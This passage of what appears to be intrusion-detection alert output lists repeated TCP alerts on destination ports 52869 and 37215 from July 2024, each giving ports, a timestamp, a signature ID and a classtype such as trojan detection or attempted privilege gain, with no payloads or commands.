                      Source Port:34450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.783840
                      SID:2027339
                      Source Port:44688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.492617
                      SID:2025132
                      Source Port:48244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.054227
                      SID:2835222
                      Source Port:52032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.392392
                      SID:2027339
                      Source Port:50516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.065904
                      SID:2829579
                      Source Port:51738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2835222
                      Source Port:49376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.592228
                      SID:2027339
                      Source Port:44300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.591367
                      SID:2027339
                      Source Port:38632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.680161
                      SID:2829579
                      Source Port:52320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.530121
                      SID:2025132
                      Source Port:60458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2829579
                      Source Port:51460
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.468386
                      SID:2831300
                      Source Port:46842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.747455
                      SID:2829579
                      Source Port:39988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.052134
                      SID:2025132
                      Source Port:56442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.183242
                      SID:2027339
                      Source Port:36324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.648653
                      SID:2027339
                      Source Port:51398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.927905
                      SID:2831300
                      Source Port:33096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.125782
                      SID:2835222
                      Source Port:59380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.235312
                      SID:2027339
                      Source Port:48658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2835222
                      Source Port:46556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.763759
                      SID:2025132
                      Source Port:52308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.982338
                      SID:2831300
                      Source Port:52008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.018251
                      SID:2027339
                      Source Port:36280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.101730
                      SID:2829579
                      Source Port:58884
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.606709
                      SID:2027339
                      Source Port:36816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.749158
                      SID:2025132
                      Source Port:55916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.556916
                      SID:2831300
                      Source Port:59872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:53.235379
                      SID:2831300
                      Source Port:46914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.652423
                      SID:2829579
                      Source Port:46008
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.186863
                      SID:2025132
                      Source Port:43190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.127943
                      SID:2835222
                      Source Port:48546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.787162
                      SID:2027339
                      Source Port:45014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861088
                      SID:2829579
                      Source Port:46190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.574335
                      SID:2027339
                      Source Port:46334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.074396
                      SID:2027339
                      Source Port:57030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.280683
                      SID:2025132
                      Source Port:39956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.553922
                      SID:2027339
                      Source Port:35856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.855214
                      SID:2027339
                      Source Port:39368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.895962
                      SID:2027339
                      Source Port:41294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.048662
                      SID:2025132
                      Source Port:40818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.694960
                      SID:2027339
                      Source Port:44710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.283236
                      SID:2025132
                      Source Port:57146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.330840
                      SID:2027339
                      Source Port:36942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.916294
                      SID:2027339
                      Source Port:57072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.085193
                      SID:2829579
                      Source Port:57722
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.671380
                      SID:2027339
                      Source Port:59544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2835222
                      Source Port:38630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.266001
                      SID:2027339
                      Source Port:39764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.205142
                      SID:2027339
                      Source Port:50352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.983376
                      SID:2027339
                      Source Port:39044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.955933
                      SID:2831300
                      Source Port:37982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:27.858951
                      SID:2027339
                      Source Port:42902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.160208
                      SID:2025132
                      Source Port:39122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.653497
                      SID:2027339
                      Source Port:33366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.122085
                      SID:2025132
                      Source Port:56598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.754228
                      SID:2829579
                      Source Port:33252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.418021
                      SID:2831300
                      Source Port:32858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.679529
                      SID:2831300
                      Source Port:49408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.207276
                      SID:2027339
                      Source Port:49888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2829579
                      Source Port:49790
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.884914
                      SID:2027339
                      Source Port:45454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.015672
                      SID:2025132
                      Source Port:39164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2835222
                      Source Port:58744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.738854
                      SID:2025132
                      Source Port:42966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.536919
                      SID:2025132
                      Source Port:52448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.660344
                      SID:2835222
                      Source Port:56444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.534266
                      SID:2025132
                      Source Port:39190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2835222
                      Source Port:45392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:11.843007
                      SID:2835222
                      Source Port:36506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.749770
                      SID:2025132
                      Source Port:36974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.987250
                      SID:2027339
                      Source Port:34528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.426771
                      SID:2025132
                      Source Port:56460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.534811
                      SID:2829579
                      Source Port:52304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.603267
                      SID:2025132
                      Source Port:34668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.387385
                      SID:2025132
                      Source Port:39148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.852858
                      SID:2835222
                      Source Port:54158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2829579
                      Source Port:32800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.045966
                      SID:2831300
                      Source Port:34146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.485916
                      SID:2831300
                      Source Port:55256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:55.889998
                      SID:2829579
                      Source Port:39486
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.320421
                      SID:2027339
                      Source Port:52392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.857938
                      SID:2831300
                      Source Port:33050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.969328
                      SID:2831300
                      Source Port:59080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.639160
                      SID:2027339
                      Source Port:40024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:51.729184
                      SID:2027339
                      Source Port:42958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.139794
                      SID:2027339
                      Source Port:58150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.910197
                      SID:2025132
                      Source Port:34242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.451363
                      SID:2027339
                      Source Port:45140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.559388
                      SID:2025132
                      Source Port:37594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.413313
                      SID:2027339
                      Source Port:57136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.680161
                      SID:2835222
                      Source Port:56766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857158
                      SID:2829579
                      Source Port:38446
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.208973
                      SID:2027339
                      Source Port:41682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.080968
                      SID:2025132
                      Source Port:53228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.465472
                      SID:2831300
                      Source Port:55164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.603798
                      SID:2027339
                      Source Port:43426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.803802
                      SID:2027339
                      Source Port:58734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.745204
                      SID:2027339
                      Source Port:33710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.897315
                      SID:2025132
                      Source Port:45242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.201041
                      SID:2027339
                      Source Port:60628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.565127
                      SID:2027339
                      Source Port:44414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2835222
                      Source Port:39464
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.392755
                      SID:2829579
                      Source Port:36890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.145992
                      SID:2835222
                      Source Port:49638
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.108564
                      SID:2829579
                      Source Port:56444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.996045
                      SID:2027339
                      Source Port:43144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.544209
                      SID:2025132
                      Source Port:42810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.216313
                      SID:2027339
                      Source Port:57988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.692242
                      SID:2027339
                      Source Port:56490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.442577
                      SID:2831300
                      Source Port:56962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.994181
                      SID:2025132
                      Source Port:58590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.611308
                      SID:2835222
                      Source Port:46892
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.314691
                      SID:2025132
                      Source Port:48180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.184196
                      SID:2831300
                      Source Port:43866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.660344
                      SID:2829579
                      Source Port:43332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.570909
                      SID:2025132
                      Source Port:51074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.035971
                      SID:2831300
                      Source Port:32902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.083231
                      SID:2027339
                      Source Port:59958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.090759
                      SID:2027339
                      Source Port:56366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.247850
                      SID:2831300
                      Source Port:60622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.720163
                      SID:2025132
                      Source Port:43668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:44.665919
                      SID:2027339
                      Source Port:59134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.403603
                      SID:2027339
                      Source Port:47978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.449958
                      SID:2025132
                      Source Port:60978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.444466
                      SID:2831300
                      Source Port:52984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.468494
                      SID:2831300
                      Source Port:34336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.144593
                      SID:2025132
                      Source Port:38672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.051748
                      SID:2025132
                      Source Port:53044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.852857
                      SID:2829579
                      Source Port:60312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2829579
                      Source Port:40632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.610532
                      SID:2027339
                      Source Port:55826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.809291
                      SID:2025132
                      Source Port:40338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.143657
                      SID:2835222
                      Source Port:55744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.807124
                      SID:2829579
                      Source Port:43254
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.554950
                      SID:2831300
                      Source Port:59310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:32.121311
                      SID:2831300
                      Source Port:44684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.058256
                      SID:2829579
                      Source Port:41108
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.234052
                      SID:2027339
                      Source Port:51202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.390561
                      SID:2025132
                      Source Port:49480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.442841
                      SID:2831300
                      Source Port:37412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.342828
                      SID:2027339
                      Source Port:59354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.204161
                      SID:2831300
                      Source Port:54652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.210554
                      SID:2831300
                      Source Port:35222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.537576
                      SID:2835222
                      Source Port:50690
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2835222
                      Source Port:38592
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.235921
                      SID:2027339
                      Source Port:48494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2835222
                      Source Port:57922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.032993
                      SID:2831300
                      Source Port:46382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.565815
                      SID:2027339
                      Source Port:35646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.635095
                      SID:2025132
                      Source Port:60604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:36.644546
                      SID:2025132
                      Source Port:34488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.529212
                      SID:2025132
                      Source Port:55104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.460569
                      SID:2829579
                      Source Port:35576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:46.637280
                      SID:2025132
                      Source Port:47582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.118555
                      SID:2027339
                      Source Port:58444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.818967
                      SID:2025132
                      Source Port:45040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.302912
                      SID:2027339
                      Source Port:36404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.612113
                      SID:2027339
                      Source Port:44166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2829579
                      Source Port:39506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.494301
                      SID:2027339
                      Source Port:54440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.422953
                      SID:2831300
                      Source Port:43966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.875016
                      SID:2025132
                      Source Port:58594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.963469
                      SID:2025132
                      Source Port:58470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.367234
                      SID:2027339
                      Source Port:48504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2829579
                      Source Port:34622
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.912455
                      SID:2025132
                      Source Port:34942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.082446
                      SID:2027339
                      Source Port:39042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.455250
                      SID:2831300
                      Source Port:46054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.767395
                      SID:2835222
                      Source Port:51922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.407221
                      SID:2027339
                      Source Port:35942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2835222
                      Source Port:55614
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.773172
                      SID:2829579
                      Source Port:52742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.348098
                      SID:2027339
                      Source Port:40532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.638173
                      SID:2831300
                      Source Port:53492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.625646
                      SID:2835222
                      Source Port:51272
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.134564
                      SID:2829579
                      Source Port:51570
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.342606
                      SID:2027339
                      Source Port:36122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257816
                      SID:2829579
                      Source Port:39472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.510666
                      SID:2027339
                      Source Port:44980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.244491
                      SID:2831300
                      Source Port:50786
